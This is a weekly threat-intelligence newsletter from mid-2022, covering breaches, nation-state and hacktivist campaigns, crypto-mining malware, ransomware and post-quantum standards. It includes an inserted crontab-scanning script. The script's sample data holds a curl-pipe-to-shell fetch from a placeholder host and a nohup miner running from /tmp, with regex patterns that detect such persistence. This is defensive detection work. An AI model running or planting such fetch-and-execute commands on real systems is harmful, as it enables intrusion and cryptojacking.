Strategic insights for leaders from tactical cyber observers.

As the world becomes increasingly dependent on the internet and cyberspace remains a contested environment, leaders must monitor geopolitical and cybersecurity risks more than ever. LookingGlass presents the Cyber Monitor – a weekly rollup of analysis and trending topics in cybersecurity for executives to keep abreast of threats, incidents, and risks to their organization and national security.

OPERATIONAL UPDATES

CYBER EVENT READOUTS & NEWS AMPLIFICATIONS

On July 5, the US National Institute of Standards and Technology (NIST) selected the first set of quantum-resistant encryption algorithms to protect sensitive data from advanced cyberattacks. The four chosen encryption algorithms will be included in the NIST’s post-quantum cryptographic standard, which is expected to be completed in about two years. The CRYSTALS-Kyber algorithm was chosen by the agency for general encryption, which is used for access to secure websites. NIST chose three other algorithms for digital signatures: CRYSTALS-Dilithium, FALCON, and SPHINCS+. The agency stated that four additional algorithms are being considered for inclusion in the new cryptographic standard. NIST The Record

Hackers claimed to have stolen data from about 1B Chinese residents after breaching a Shanghai police database, in what industry experts are calling the country’s largest cybersecurity breach in history. The entity claiming the attack has offered to sell more than 23 TB of stolen data from the database, including names, addresses, birthplaces, national IDs, phone numbers, and criminal case information, according to an anonymous post on an online cybercrime forum. The unidentified hacker demanded 10 bitcoin (~$200k). The magnitude of the alleged leak has sent shockwaves through the Chinese security community. On July 4, Zhao Changpeng, the founder and CEO of cryptocurrency exchange Binance, tweeted that the company had discovered a breach of 1B resident records “from one Asian country,” without specifying which, and that it had since increased verification procedures for potentially affected users. The latest alleged incident highlighted the difficulties Beijing faces as it collects data on hundreds of millions of people while tightening controls on sensitive online content. It is unknown how the alleged cyberattackers in this month’s breach obtained access to Shanghai police servers. One popular theory among cybersecurity experts was that the breach was caused by a third-party cloud infrastructure partner. Bloomberg

Analyst Comment: LookingGlass analysis suggests that the actor that claimed to have stolen the data does not appear to be a native Chinese speaker and might not be familiar with China’s government structure.

Some online speculation suggests that the data leak is related to the investigation into high-ranking officers at the Shanghai Public Security Bureau. Gong Daoan (龚道安), the Secretary of the Party Committee of the Shanghai Public Security Bureau, and Shen Yuxin (沈与辛), the Secretary of the Party Committee of the Data Division of the Shanghai Public Security Bureau, were removed from their posts in 2020 and 2021, respectively, over corruption-related charges. Because of Gong’s preference, Aliyun (Alibaba Cloud) was allegedly the cloud server service provider for the Shanghai Public Security Bureau at the time.

The timing of the data leak is also noteworthy. This data leak occurred prior to the Chinese Communist Party’s 20th National Congress, which will be held in November 2022. Xi Jinping, the President of China, will secure a record-breaking third term as Communist Party Chairman during the National Congress. China’s authorities quickly censored online discussions about the breach. Although the data breach censorship may reflect Beijing’s increased sensitivity ahead of a political milestone, it is also consistent with Beijing’s usual response to criticism. With current evidence, it is difficult to determine the true nature of the data leak. LookingGlass analysis suggests that this data leak might be part of an information campaign to incite domestic tensions against the Chinese government.

China accused the US National Security Agency of conducting a cyberattack on Chinese scientific research organizations. The National Computer Virus Emergency Response Center in Beijing claimed that FoxAcid, a hacking program linked to the US National Security Agency (NSA), was discovered in hundreds of key information systems used by scientific research institutes. The center also claimed that the attack could indicate the NSA’s preparations for larger-scale cyberwarfare. FoxAcid is a critical component of the NSA’s cyberespionage operations, particularly against China and Russia, and is used by the computer network exploitation team affiliated with the NSA’s Office of Tailored Access Operations (TAO), according to documents revealed by former NSA contractor Edward Snowden. It targets bugs in popular web browsers such as Microsoft Internet Explorer and Apple Safari in order to support cross-platform attacks. Since the Snowden disclosures, China has strengthened its information security infrastructure. Beijing introduced a new national cybersecurity standard known as “hierarchical protection 2.0” in 2019. The standard requires all public institutions to conduct regular drills to strengthen their cyberdefenses. However, universities and research institutes continue to be a source of concern. SCMP

Analyst Comment: Noting that this piece was published by a Chinese news source, we assess there are significant exaggerations and misstatements in this messaging. China has a history of holding onto old information and releasing it later for strategic effect or as signaling towards its adversaries. It is unclear whether this piece was published at this time in response to an event or to strategically position China for future geopolitical events. This activity is consistent with the Chinese Communist Party’s military-civilian fusion (MCF) cyber strategy to strengthen China’s cyber resilience and achieve cyber sovereignty. It is also likely part of China’s strategic intent to both normalize its espionage behaviors and establish itself as a cyber superpower on a par with the US.

Russian hackers conducted an attack on DTEK Group, Ukraine’s largest private energy conglomerate, according to the firm on Friday, July 1. A Russian-speaking hacking group known as XakNet claimed to have breached DTEK’s networks and posted screenshots on the Telegram app of purported DTEK data as proof. XakNet surfaced in March, according to a US and allied government advisory, and has claimed to target Ukrainian officials in support of Russia’s war. Alden Wahlstrom, a senior analyst at US cybersecurity firm Mandiant, stated XakNet has accessed data belonging to an organization that was likely hacked by a Russian cyber espionage group, suggesting a possible link between XakNet and the Russian government. The hacking incident coincided with the Russian shelling last week of a DTEK-owned thermal power plant in Kryvyi Rih, in central Ukraine, according to DTEK. Microsoft in an April report pointed out that Russian hacking has been used in tandem with kinetic military strikes. A cyberattack hit a Ukrainian broadcast company on March 1, the same day as a Russian missile strike against a TV tower in Kyiv, the report said. CNN

Analyst Comment: XakNet’s Telegram channel materialized in early March. While some other hacktivist groups, such as KillNet and their subordinate LEGION – Cyber Spetznaz, appear to focus mostly on targeting organizations located in Europe and the USA, XakNet’s victims are often located in Ukraine, based on LookingGlass observations. In a recent interview with the pro-Russian infosec blogger Russian OSINT, XakNet claimed that at least some members of the group also participated in attacks targeting Georgia during the conflict in 2008. The group also stated that they chose the name “XakNet” as a tribute to an underground forum that was originally founded in 2007 and is no longer active. Many of the group’s TTPs used during the war in Ukraine match the tactics that were used against Georgia in 2008, including DDoS and website defacement, highlighting the importance of lessons learned from past conflicts.

Malware used in crippling cyberattacks against the Iranian steel industry last week is connected to an attack that shut down the country’s rail system last year. In both cases, a malware strain was used to impact physical and critical infrastructure, according to a report from Check Point Research. The overlaps in the code, combined with context clues and recycled jokes, indicate that the same threat actor, dubbed Indra, is behind the attacks impacting Iran’s infrastructure. On June 27, a steel billet production line at the Khuzestan Steel Corporation began to malfunction. According to reports, sparks flew, starting a fire in the heart of the plant. In a statement to the press, Khuzestan Steel’s CEO denied that any damage had been done. In both the steel and railway attacks, the perpetrators posted a notice instructing victims and passengers to call the phone number of the office of Ayatollah Khamenei. An executable (chaplin.exe) discovered in last week’s attack is a variant of malware identified as Meteor, a wiper strain believed to have been used in last year’s attack against Iran’s railway system. The researchers claimed that it was clear both variants shared a codebase. Threat Post

TRENDING TOPICS

Eclypsium researchers categorized vulnerabilities from CISA’s Known Exploited Vulnerabilities (KEV) Catalog in order to identify exploitation trends over the last 20 years and gain a better understanding of the types of assets and code that threat actors are most interested in:

  • Firmware (e.g. Intel AMT, Cisco, F5 Networks)
  • Server Software (e.g. Apache, Microsoft Exchange)
  • Operating Systems (e.g. Windows, Android)
  • Web Browser (e.g. Google Chrome, Internet Explorer)
  • Office applications (e.g. Microsoft Word, Excel)
  • Applications (e.g. WinRAR, WhatsApp)
  • Software library (e.g. OpenSSL)
  • Virtualization (e.g. Docker, VMWare)

In terms of exploited vulnerabilities, firmware led the way (184), followed by server software (168), operating systems (161), web browsers (127), office applications (51), applications (43), software libraries (24), and virtualization (20). The data shows that firmware has consistently been an area of focus in cyberattacks, and it is up to security teams to build the processes to ensure the posture and integrity of their critical firmware, according to the researchers. Eclypsium

[Figure: Known Exploited Vulnerabilities By Category]

Analyst Comment: Firmware represents a large attack surface that can allow a stealthy attacker to compromise devices and launch devastating attacks. However, firmware security and updates are often overlooked by organizations. This research by Eclypsium demonstrates the importance of attack surface monitoring in relation to firmware.
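To reproduce the kind of per-category tally Eclypsium reports, here is an added example (not Eclypsium’s or CISA’s code) that buckets KEV entries into the eight asset classes above and counts them. It assumes the field names of CISA’s public KEV JSON feed (vendorProject, product, cveID under a top-level "vulnerabilities" list); the keyword map is a hypothetical, partial approximation of the classification, and the entries embedded below are constructed samples rather than real catalog records.

```python
"""Bucket CISA Known Exploited Vulnerabilities (KEV) entries into the eight
asset classes used in the Eclypsium analysis and count exploited CVEs per class.

Added example, not Eclypsium's or CISA's own code. The feed field names are an
assumption about the public KEV JSON; RULES is a hypothetical, incomplete
keyword map; SAMPLE_ENTRIES are constructed, not real catalog records.
"""
import json
from collections import Counter

# Ordered rules: the first category whose keyword appears in "vendor product"
# wins, so specific classes (a browser, a library, an Exchange server) are
# tested before the broad OS class they would otherwise fall into.
RULES = [
    ("Web Browser",         ("chrome", "chromium", "internet explorer", "safari", "firefox")),
    ("Office applications", ("office", "word", "excel", "powerpoint", "outlook")),
    ("Software library",    ("openssl", "log4j", "glibc", "libwebp")),
    ("Server Software",     ("exchange", "apache", "tomcat", "weblogic", "confluence", "sharepoint", "iis")),
    ("Virtualization",      ("vmware", "vcenter", "esxi", "docker", "hyper-v")),
    ("Firmware",            ("amt", "cisco", "f5", "big-ip", "netgear", "fortinet", "router", "firmware", "bios", "uefi")),
    ("Operating Systems",   ("windows", "android", "linux kernel", "macos", "ios")),
    ("Applications",        ("winrar", "whatsapp", "acrobat", "reader", "zoom")),
]
UNCLASSIFIED = "Unclassified"


def categorize(vendor: str, product: str) -> str:
    """Return the asset class for one KEV entry, or UNCLASSIFIED if no rule matches."""
    haystack = f"{vendor} {product}".lower()
    for category, keywords in RULES:
        if any(keyword in haystack for keyword in keywords):
            return category
    return UNCLASSIFIED


def count_by_category(entries) -> Counter:
    """Tally entries (dicts shaped like KEV feed items) per asset class."""
    return Counter(
        categorize(entry.get("vendorProject", ""), entry.get("product", ""))
        for entry in entries
    )


def ranked(counts: Counter):
    """Categories ordered by exploited-CVE count, highest first (ties by name)."""
    return sorted(counts.items(), key=lambda item: (-item[1], item[0]))


def load_kev(path: str):
    """Load the KEV JSON feed from disk (assumed top-level key: "vulnerabilities")."""
    with open(path, encoding="utf-8") as fh:
        return json.load(fh)["vulnerabilities"]


# Constructed sample entries mirroring the feed's shape; the CVE ids are placeholders.
SAMPLE_ENTRIES = [
    {"cveID": "CVE-0000-0001", "vendorProject": "Intel", "product": "Active Management Technology (AMT)"},
    {"cveID": "CVE-0000-0002", "vendorProject": "Cisco", "product": "IOS XE"},
    {"cveID": "CVE-0000-0003", "vendorProject": "F5", "product": "BIG-IP"},
    {"cveID": "CVE-0000-0004", "vendorProject": "Microsoft", "product": "Exchange Server"},
    {"cveID": "CVE-0000-0005", "vendorProject": "Apache", "product": "HTTP Server"},
    {"cveID": "CVE-0000-0006", "vendorProject": "Microsoft", "product": "Windows"},
    {"cveID": "CVE-0000-0007", "vendorProject": "Google", "product": "Android"},
    {"cveID": "CVE-0000-0008", "vendorProject": "Google", "product": "Chromium V8"},
    {"cveID": "CVE-0000-0009", "vendorProject": "Microsoft", "product": "Internet Explorer"},
    {"cveID": "CVE-0000-0010", "vendorProject": "Microsoft", "product": "Office"},
    {"cveID": "CVE-0000-0011", "vendorProject": "RARLAB", "product": "WinRAR"},
    {"cveID": "CVE-0000-0012", "vendorProject": "WhatsApp", "product": "WhatsApp"},
    {"cveID": "CVE-0000-0013", "vendorProject": "OpenSSL", "product": "OpenSSL"},
    {"cveID": "CVE-0000-0014", "vendorProject": "Docker", "product": "Docker Desktop"},
    {"cveID": "CVE-0000-0015", "vendorProject": "Acme Corp", "product": "Widget"},
]

if __name__ == "__main__":
    # Swap SAMPLE_ENTRIES for load_kev("known_exploited_vulnerabilities.json")
    # to run against the real catalog.
    for category, count in ranked(count_by_category(SAMPLE_ENTRIES)):
        print(f"{category:20s} {count}")
```

Entries that land in Unclassified are the ones worth reviewing by hand; they are where a keyword map silently skews the tally.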

Vulnerability coordination and bug bounty platform HackerOne on Friday, July 1, disclosed that a former employee at the firm improperly accessed security reports submitted to it for personal gain. The employee, who had access to HackerOne systems between April 4 and June 23, 2022, for triaging vulnerability disclosures associated with different customer programs, has since been terminated by the company as of June 30. HackerOne said it was alerted to the breach on June 22 by an unnamed customer, which asked it to “investigate a suspicious vulnerability disclosure” through an off-platform communication from an individual with the handle “rzlr” using “aggressive” and “intimidating” language. Subsequently, analysis of internal log data used to monitor employee access to customer disclosures traced the exposure to a rogue insider, whose goal was to re-submit duplicate vulnerability reports to the same customers using the platform to receive monetary payouts. In an incident report, HackerOne stated that the threat actor created a HackerOne sockpuppet account and had received bounties in a handful of disclosures. The report added that seven HackerOne customers received direct communication from the threat actor. The Hacker News HackerOne

Analyst Comment: This incident demonstrates the importance of insider threat monitoring. According to a Proofpoint report, both insider-led incidents and associated costs have been on the rise. While the incident at HackerOne happened to an insider with malicious intent, many insider threats are associated with careless behavior of employees, highlighting the importance of employee training and clearly defined policies that are consistently enforced.

CYBER ACTORS

NATION STATE ACTORS

The personal information of over 300k Israelis was leaked last month by an Iranian hacker group targeting Israeli travel booking sites. The group, named Sharp Boys, claimed it obtained data from Israeli tourism sites including ID numbers, addresses, credit card information, and more. Over 20 sites of travel agencies, hotels, and resorts were hacked, including hotel4u.co.il, hotels.co.il, isrotel.com, minihotel.co.il, trivago.co.il, and danhotels.com. According to reports, the information leaked included personal requests by Israeli customers to cancel planned vacations due to various health issues. “Wherever you go, even on your trips, you are under our control. Remember our name,” said Sharp Boys in a photo posted on their Telegram channel. The Sharp Boys hacker group first appeared in December when it announced it had hacked two Israeli hiking websites, leaking the information of 100k users and offering the information of around 3M people for sale. The group has not made or referenced any ransom demands in any of its attacks. The Jerusalem Post

Analyst Comment: While Sharp Boys is a newly discovered Iran-linked group, Israel is a frequent target of Iranian cyber activity. Although no ransom demands were made in this case, LookingGlass has previously observed Iran-linked ransomware groups targeting organizations located in Israel and publishing their data on their leak sites.

A targeted attack campaign has been compromising home and small-business routers since late 2020 with the goal of hijacking network communications and infecting local computers with sophisticated backdoors. Attacks against home routers are not new, but the implants used by attackers in these cases were designed for local network reconnaissance and lateral movement instead of just abusing the router itself. Telecommunications company Lumen estimates that the attack campaign has compromised at least 80 routers and networks, primarily from North America and Europe and has seen signs of infections coming from routers made by ASUS, Cisco, DrayTek, and NETGEAR. However, the company’s researchers only managed to recover the exploit script used against a JCG-Q20 router. The attackers were seen using services by Chinese companies Alibaba and Tencent either to host files (Alibaba’s Yuque platform) or as redirectors for C2 (Tencent). Security experts have warned since the beginning of the COVID-19 pandemic that remote employees are easier to target inside their home networks because their work devices don’t benefit from the same levels of protection as when they’re behind corporate firewalls and routers. While the adoption and implementation of zero-trust network security principles can mitigate some of those risks, many organizations have been forced to do split network tunneling on their VPN clients to ease the burden on their VPN gateways and available bandwidth. Therefore, in many cases, a portion of non-critical or non-work-related traffic from the devices used by their remote employees continues to flow, potentially unencrypted, through those users’ home routers. CSO Online

Analyst Comment: Current evidence shows that the actors take additional steps to hide their C2 infrastructure, such as delivering the initial exploit from a dedicated virtual private server and using compromised routers as proxy C2s. Additionally, the actors rotate proxy routers periodically to further avoid detection. The actions and TTPs observed in the campaign indicate that the group behind the operation is highly sophisticated and possibly linked to a state-sponsored group. It is also noteworthy that the actors used both Chinese and Arabic to communicate as a means of practicing strong opsec. The final goal of this campaign remains unknown. As threat actors continue to evolve, small office/home office (SOHO) networks will likely face additional cyber security challenges.

HACKTIVISTS

Norway’s National Security Authority (NSM) confirmed last week that some of the country’s most important websites and online services were taken down by a massive DDoS attack conducted by a pro-Russian group. NSM did not explicitly attribute the attacks to a threat actor, but the pro-Russian Legion/Cyber Spetsnaz group published on its Telegram channel a list of Norwegian organizations to target. Similar attacks recently targeted the Lithuanian government, Italian organizations and government websites, and Romania for providing support to Ukraine. Norwegian authorities have now confirmed that the attacks hit large companies that offer essential services to the population. Based on the observed victims and close collaboration with several impacted organizations, the attacks primarily focused on the exploitation of poorly configured web servers and short-term disruptions. Proper hardening and implementation of a WAF, along with DDoS protection, may preemptively resolve the issue, as the attackers’ total pool of unique source addresses may be exhausted quickly. The logged sources of the attacks showed that the attackers are actively using spoofed IP addresses and deploying tools on compromised IoT devices and hacked web resources. Experts believe the pro-Russian group will continue to conduct attacks against Norway and other countries supporting Ukraine. Cybersecurity World Conference

Analyst Comment: Pro-Russian hacktivist groups have been targeting Ukraine, its allies, and any country assisting them since the beginning of Russia’s large-scale invasion of Ukraine in February 2022. LookingGlass assesses that while some attacks are opportunistic, other attacks coincide with current events. This particular activity took place around the same time Norway joined NATO. In another example, hacktivist groups targeted European transportation hubs, including airports and railways, in response to decisions by European countries and the USA to provide certain weapons to Ukraine. The timing of some of these attacks also coincided with Russia bombing transportation facilities in Ukraine. More recently, KillNet and their affiliates have targeted Lithuania and Norway following the restrictions on Russian transport and transit of certain goods introduced by these countries. We must also note that coincidence does not always indicate correlation or causation.

Anonymous claimed it caught fake actors helping Killnet under the name of Anonymous; the collective has warned Killnet of impending consequences. The Russia-affiliated group Killnet has claimed to hack several Lithuanian government and public websites, taking responsibility on Telegram in a video message. The group stated the cyber-attacks were in response to Lithuania’s decision to impose sanctions on Russia, a move that follows the EU’s decision earlier this year to sanction the Kremlin after it invaded Ukraine. The pro-Russian hacker group has also demanded in the video to allow the transport of materials to Kaliningrad via Lithuania to avoid further interruption of government sites. Anonymous previously declared cyber war against pro-Russian hacker groups on their Twitter account and leaked over 360k government files. The Collective also successfully conducted DDoS attacks against Killnet and tracked the Anon hackers who helped Killnet secretly. The Tech Outlook

[Image: Anonymous on Twitter, 6.29.22]

Analyst Comment: Both Anonymous and KillNet have been involved in the conflict between Russia and Ukraine since its early stages, with Anonymous supporting Ukraine, and KillNet supporting Russia. Earlier this year the groups declared a “cyber war” on each other. The groups have targeted each other with DDoS attacks and leaks. Direct confrontation between groups supporting different sides of an ongoing conflict is another noteworthy development in this ongoing conflict that may allow researchers to learn additional information about the threat actors, their affiliate members, motivations, and TTPs.

CYBERCRIME

Two different groups are impersonating the LockBit ransomware group – SolidBit and CryptOn. SolidBit is a variant of Yashma (aka Chaos) ransomware. The group is reportedly working with the original developer of Yashma ransomware. Both SolidBit’s login and chat sites look nearly identical to LockBit’s chat site, except that the main color scheme was changed from red to green. Separately, CryptOn inserted the LockBit Ransomware 2.0 logo at the top of its site to disguise itself as LockBit, but it has not been confirmed whether it is actually using ransomware. Neither group has claimed any connection with LockBit, although they both seem to be trying to exploit the LockBit ransomware group’s reputation. Medium.com

[Image: LockBit and SolidBit sites]

Analyst Comment: Hackers impersonating each other is a commonly used technique. Threat actors can impersonate each other for various reasons, including attempts to hide their true intent, TTPs, and identity. All threat actor types are capable of this activity; however, it has historically been attributed to nation state actors.

Microsoft Security Intelligence is warning of a long-running campaign conducted by a cloud threat actor group, tracked as 8220, that is now targeting Linux servers to install crypto-miners. The 8220 threat actors are Chinese speaking and have been active since at least 2017 and are largely focused on crypto-mining campaigns. According to Microsoft researchers, the group has actively updated its techniques and payloads over the last year. In a recent campaign, the group targeted i686 and x86_64 Linux systems and used RCE exploits for CVE-2022-26134 (Atlassian Confluence) and CVE-2019-2725 (WebLogic) for initial access. After gaining access to a target system, the actors download an evasive loader from jira[.]letmaker[.]top. The loader eludes detection by clearing log files and disabling cloud monitoring and security tools. It is used to download the pwnRig cryptominer (v1.41.0) and an IRC bot that runs commands from a C2 server. It maintains persistence by creating either a cron job or a script that runs every 60 seconds as nohup. Microsoft urges organizations to secure systems and servers, apply updates, and use good credential hygiene to protect their networks. Security Affairs

Analyst Comment: LookingGlass analysts have observed that the initial attacks exploiting CVE-2022-26134 appeared to come from China-linked APT groups, with the primary goal of dropping web shells. Additionally, in early June 2022, Chinese-language research on CVE-2022-26134 in Confluence servers was translated into Russian and shared on underground forums. LookingGlass assesses actors will continue to exploit CVE-2022-26134.
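The persistence described above (a job firing every minute, launched under nohup, pulling a loader from a remote host) leaves a recognizable footprint in a crontab. The following added example, which is not Microsoft’s or any vendor’s detection logic, scans user-crontab-format lines for that footprint; the crontab text embedded in it is constructed, and the domain in it is a placeholder rather than a real indicator.

```python
"""Flag crontab entries matching the persistence pattern reported for the 8220
campaign: a job that runs every minute and fetches-and-executes remote content,
runs under nohup, executes from a scratch directory, or decodes base64 inline.

Added example, not vendor detection logic. Assumes user-crontab format (five
schedule fields then the command, no user column). SAMPLE_CRONTAB is constructed;
the domain is a placeholder.
"""
import re

EVERY_MINUTE = {"*", "*/1"}

# Command-level indicators. Each tuple is (reason, compiled pattern).
COMMAND_INDICATORS = [
    ("downloads and pipes to a shell", re.compile(r"\b(curl|wget)\b[^|;]*\|\s*(ba)?sh\b")),
    ("runs under nohup",               re.compile(r"\bnohup\b")),
    ("executes from a scratch directory", re.compile(r"(^|\s)/(tmp|dev/shm|var/tmp)/")),
    ("decodes base64 inline",          re.compile(r"base64\s+(-d|--decode)\b")),
]


def parse_cron_line(line: str):
    """Return (schedule, command) or None for blank lines, comments and VAR=value lines."""
    line = line.strip()
    if not line or line.startswith("#") or "=" in line.split()[0]:
        return None
    if line.startswith("@"):                      # @reboot, @hourly, ...
        parts = line.split(None, 1)
        return parts[0], (parts[1] if len(parts) > 1 else "")
    parts = line.split(None, 5)
    if len(parts) < 6:
        return None
    return " ".join(parts[:5]), parts[5]


def is_every_minute(schedule: str) -> bool:
    """True for '* * * * *' or '*/1 * * * *' style schedules."""
    fields = schedule.split()
    return (len(fields) == 5 and fields[0] in EVERY_MINUTE
            and all(field == "*" for field in fields[1:]))


def assess(line: str):
    """Reasons a line looks like miner/loader persistence; [] if clean, None if not a job."""
    parsed = parse_cron_line(line)
    if parsed is None:
        return None
    schedule, command = parsed
    reasons = ["runs every minute"] if is_every_minute(schedule) else []
    reasons += [reason for reason, pattern in COMMAND_INDICATORS if pattern.search(command)]
    # A frequent schedule alone is common for legitimate monitoring jobs, so it only
    # counts as context: a finding needs at least one command-level indicator.
    if reasons == ["runs every minute"]:
        return []
    return reasons


def scan(crontab_text: str):
    """Return [(line_number, line, reasons)] for every suspicious job in the text."""
    findings = []
    for lineno, line in enumerate(crontab_text.splitlines(), 1):
        reasons = assess(line)
        if reasons:
            findings.append((lineno, line.strip(), reasons))
    return findings


# Constructed sample crontab; "update.example.invalid" is a placeholder, not an IoC.
SAMPLE_CRONTAB = """\
# constructed sample for testing the scanner
PATH=/usr/local/bin:/usr/bin:/bin
0 3 * * * /usr/bin/certbot renew --quiet
*/5 * * * * /usr/local/bin/node_exporter_check.sh
* * * * * curl -fsSL http://update.example.invalid/x.sh | sh
*/1 * * * * nohup /tmp/.x/miner --config /tmp/.x/cfg >/dev/null 2>&1 &
@reboot /dev/shm/.s/run.sh
"""

if __name__ == "__main__":
    # Feed real data with: crontab -l -u <user> | python3 this_script.py  (or read the
    # files under /var/spool/cron and /etc/cron.d, adjusting for the user column there).
    import sys
    text = sys.stdin.read() if not sys.stdin.isatty() else SAMPLE_CRONTAB
    for lineno, line, reasons in scan(text):
        print(f"line {lineno}: {line}\n    -> {', '.join(reasons)}")
```

The page also notes the loader clears log files and disables cloud monitoring agents, so a crontab review like this is most useful when the findings are correlated with agent heartbeat gaps rather than relied on alone.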

Ukrainian police arrested suspected members of a cyber-criminal gang conducting an EU payments phishing scheme. In a statement, Ukraine’s Cyber Police Department and the Kyiv-based Pechersk Police Department said the criminal group created and promoted roughly 400 phishing links to send to the country’s citizens. The links sent victims to malicious, fraudulent websites resembling EU resource pages. The phishing group disguised its scam as an EU social security payments scheme that Ukrainian residents could utilize after providing their bank card details. After the cybercriminals obtained a victim’s bank details, they compromised online-banking accounts and withdrew funds without permission. Specialists from the National Bank of Ukraine, who assisted in the investigation, say that over 5k citizens were defrauded, leading to losses of roughly $3.38M. In total, nine people have been arrested. Law enforcement also conducted searches of the suspects’ homes and seized computer equipment, mobile phones, bank cards, and cash. ZDNet

Malicious individuals are using stolen PII and voice and video deepfakes to secure remote IT, programming, database, and software-related jobs, the FBI warned last week. Deepfakes are created with deep machine learning algorithms and generative adversarial networks and are becoming increasingly difficult to detect. The FBI’s warning reveals a recent increase in complaints of individuals using deepfakes and stolen PII to apply for a variety of remote jobs and work-at-home positions, some of which include access to customer PII, financial data, corporate IT databases and/or proprietary information. These individuals are using stolen PII to bypass pre-employment background checks, and voice spoofing – or potentially voice deepfakes – during online interviews. The FBI highlighted that the actions and lip movement of those interviewed on-camera do not completely coordinate with the audio of the person speaking. While these discrepancies may be easy to notice, they are also easily dismissed due to the occasional volatility of audio and video communications. Organizations looking for IT professionals, programmers, software developers, and database administrators are advised to take extra precautions to ensure they are not ensnared by these and other attackers. Help Net Security

Analyst Comment: Malicious actors have used voice spoofing tactics long before this case. For example, in 2019, fraudsters used voice spoofing to target the CEO of a British company to facilitate an illegal funds transfer. Deepfakes can be used not only for committing fraud, but also for generation of fake social media profiles and video materials that can be utilized in disinformation campaigns.

The notorious REvil ransomware group likely resurfaced three months after its members were arrested by the Russian Federal Security Service (FSB) in January. The financially motivated ransomware group known as REvil emerged in 2019 and spread quickly after extorting $11M from the meat-processor JBS. The group would incentivize its affiliates to carry out cyberattacks for them by giving a percentage of the ransom pay-outs to those who help with infiltration activities on targeted computers. In January, the FSB said it seized more than 426M rubles and 500k euros, $600k in cash, cryptocurrency wallets, computers, and 20 high-end cars. More recently, cybersecurity researchers have put forward samples of REvil ransomware. They found that, based on samples showing identical creation dates and compilation strings, along with several other attributes, they had likely identified the original REvil ransomware developer, bolstering the assessment that REvil has returned. Moreover, in late April, security researchers found that malware used in previous attacks had resumed activity after a period of silence. Two researchers recently uncovered a blog on the dark web used to publish ransomware attacks enticing others to take part in the practice. They also came across news that attackers are seeking to recruit more ghost hackers. The Hacker News TechCrunch

Analyst Comment: REvil arrests in early 2022 initially may have seemed like a breakthrough in US-Russia coordination and cooperation in tracking down cybercriminals. However, from the start there were some questions that remain unanswered, including a lack of a noticeable change in REvil ransomware detections, according to ReversingLabs. Another curious fact was that the arrested REvil members were charged with “Illicit Circulation of Payment Methods” (Article 187.2 of Criminal Code of Russian Federation), as opposed to being charged with a crime related to information technology (Articles 272-274.1 of Criminal Code of Russian Federation). This led to ongoing speculation that the arrests only affected money mules involved in REvil money laundering operations. The recent REvil resurgence raises even more questions among security researchers, at the same time suggesting that Russia remains a safe haven for ransomware groups.

TECHNOLOGY

BLOCKCHAIN & WEB3

Researchers identified blockchain (BC) technology’s potential to address the top five challenges in Industry 5.0:

  1. Centralization: The current challenge is that systems are fragmented, and data storage is an issue. This has implications for network latency and computing capacity requirements. BC would address this challenge by establishing decentralized access, increased transparency, and low-cost processing power, among other benefits.
  2. Establishing Trust: Manufacturers are currently facing specific safety requirement challenges. This has implications for increased redundancy and platform reliance. Because the ledger’s immutability prevents tampering, BC would provide a solution to this problem.
  3. Security: The current issue involves unauthorized data access and modification. Data breaches, data loss, centralized servers, and single points of failure are all affected. With BC technology, databases would instead be decentralized, immutable record ledgers.
  4. Cost: The current challenge necessitates the use of middlemen, mediators, and a centralized system. This has cost and time implications, as well as a high risk of fraud and product duplication. The application of BC technology would result in a decentralized database and bitcoin payment processing.
  5. Transparency: The current challenge revolves around policies, standards, rules, and monitoring systems that are specific to each company. This has implications for poor customer relationships and decreased visibility. BC technology would address this issue by utilizing distributed ledger technology with a consensus method for transaction verification.

IEEE Xplore

The Italian Ministry of Economic Development has announced that certain blockchain projects will be eligible for up to $46M in government subsidies beginning in September 2022. The Ministry stated that companies and public/private research firms will be able to apply for government funding for the development of projects related to AI, IoT, and blockchain technology. The $46M budget is part of the Italian government’s goals for investments in technology, research, and innovation. Cointelegraph

Analyst Comment: This announcement demonstrates that governments of more and more countries embrace emerging technologies, including blockchain, despite a recent cryptocurrency crash. Blockchain technology, however, is not limited by cryptocurrency, meaning that these government subsidies may be used for development of other blockchain applications.

CRITICAL & EMERGING TECHNOLOGY

Researchers proposed a deep learning and IoT-based monitoring system to protect computer numerical control (CNC) machines from cyberattacks. The proposed infrastructure was used to monitor the cutting process while maintaining the cutting stability of CNC machines. For this purpose, a force sensor was installed in the milling CNC machine center to measure the vibration conditions. An IoT architecture was designed to connect the sensor node and the cloud server via the message queue telemetry transport (MQTT) protocol to capture the real-time machine status. In order to keep the CNC machine in good working order, an improved deep neural network (DNN) model was designed to classify the different cutting conditions (i.e., stable cutting and unstable cutting). As a result, the developed deep learning model can accurately determine whether the data the smart sensor transmits via the internet is real cutting data or fake data caused by cyberattacks or by inefficient sensor readings due to temperature, humidity, and noise signals. The proposed approach produced results indicating that deep learning can outperform other traditional machine learning methods for vibration control. Additionally, diverse scenarios were presented to validate the effectiveness of the developed system, which could automatically disconnect to secure the system when a cyberattack is detected and switch to the backup broker to continue the runtime operation. IEEE Xplore


Researchers have developed a novel chaotic encryption scheme (CES)-based blockchain system for an IoT environment. Traditional IoT systems enlist the help of a third party to secure sensitive data during transmission, which can lead to complex and serious issues. Blockchain technology, according to the researchers, is the modern-day solution for overcoming security issues in an IoT environment and eliminating third-party involvement. In this paper, highly secure chaotic encryption is used to ensure that attackers cannot access the sensitive information collected. Extensive experiments were carried out to validate the security of the proposed parameterized algorithm, using a bimodal chaotic scroller methodology to defeat Internet of Medical Things (IoMT) attacks such as brute-force attacks. As a result, a blockchain that uses this chaotic encryption can improve the security of sensitive patient data collected from IoT devices and enhance user privacy, according to the researchers. However, constraints such as limited computing resources and a lack of memory can prevent IoT devices from acting as blockchain hubs, so the proposed system still needs refinement in how it handles attacks. According to the researchers, the CES-based blockchain architecture for 5G-enabled networks can be improved in the future by testing the security of images on the IoT network to make it more efficient and adaptable. IEEE Xplore

GOVERNANCE

USG UPDATES

The Department of Defense is offering rewards to ethical hackers who discover critical or severe vulnerabilities in the agency’s networks. The Pentagon’s first “Hack U.S.” program launched on Monday, July 4, in partnership with bug bounty platform HackerOne and under the auspices of the department’s vulnerability disclosure program. The pilot project began with a $110k budget. Researchers will be paid $1k for each flaw discovered and reported, plus an additional $500 for “high severity” flaws discovered. According to the DoD, hackers can also earn $3k for “additional specialty categories,” as well as a $5k grand prize bonus. The bug bounty is the Pentagon’s latest effort to thwart potential digital threats, particularly those posed by foreign adversaries such as Russia and China. The Record

